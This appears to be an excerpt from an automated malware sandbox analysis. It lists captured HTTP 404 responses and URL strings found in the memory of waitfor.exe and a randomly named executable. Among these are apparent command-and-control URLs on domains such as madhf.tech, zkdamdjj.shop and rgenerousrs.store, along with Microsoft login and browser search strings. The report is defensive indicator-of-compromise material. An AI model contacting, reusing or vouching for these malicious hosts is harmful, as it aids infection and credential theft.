                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 02 Dec 2024 14:24:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:13 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:19 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:21 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:25:29 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:25:32 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:25:37 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:44 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:47 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:25:52 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:26:16 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:26:18 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:26:21 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Dec 2024 14:26:24 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:26:47 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q999qeSC8rjum2VgqBSdrdB5hrZyxQ9k3wIitk0%2Bq%2BUmuicI%2FGUNZtzB%2ByyALXbC%2BlFu97B3Cmc62QK5iyb6PSzYefJbmUUpBE9ElfS4bJ5vZ6bMzPbhrA0Xg2DFjoBwq1JEuzAR%2Fj8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbfe719a1919b6-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:26:49 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SafWd9HfBOJymYdjoJB712v%2Fy6PkvH8BrDlPy9nQ1Cl%2BnX28Tamxy4nEadM3QzsA8TVLUwG6WD1vrpVcEbjlu%2FuN7ud6VHj10Az9jLyhtZPoQRrhnzG%2Fk%2FWqG0hT2UkL10uPJKY2b44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbfe8279eff5f7-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:26:52 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLqNiMYY1ux9mYEQfcHVl7N%2FI4UrRyMKGZ5llvJ9iBA6ZCO%2Bqe3t%2BfOb76vYEfFkDW3yK3ClLINxBWm4UFkZAabfNKsJ7q%2FkWlKL5IyiO1ODG2REysVk%2FQzJPfwsaRqWn8yXEM7M1Ks%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbfe931d1e42e8-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1811&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 14:26:55 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEc2f3RJZfHySdKuuKhrzrNmxVGOIJAoIJyqvgP%2Bmxeylgr%2BltjfD%2BMdg5J7HcRCQaW5EwPAMf34fJLufWrUzS5PUU1pZg6tnFDhp%2BjiwQ0kvtj6eSHQQkhv3%2FDLTrcJED5LFQDk%2F7g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbfea3fa417d24-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Jcsa.info
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xV
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR1
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVM
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHs
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/display.cfm
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000031AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rgenerousrs.store
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rgenerousrs.store/8gp4/
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: waitfor.exe, 00000005.00000002.4470341771.00000000057AA000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000002E8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: waitfor.exe, 00000005.00000003.2486126896.0000000007B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info
                Source: waitfor.exe, 00000005.00000002.4470341771.000000000643A000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000003B1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP
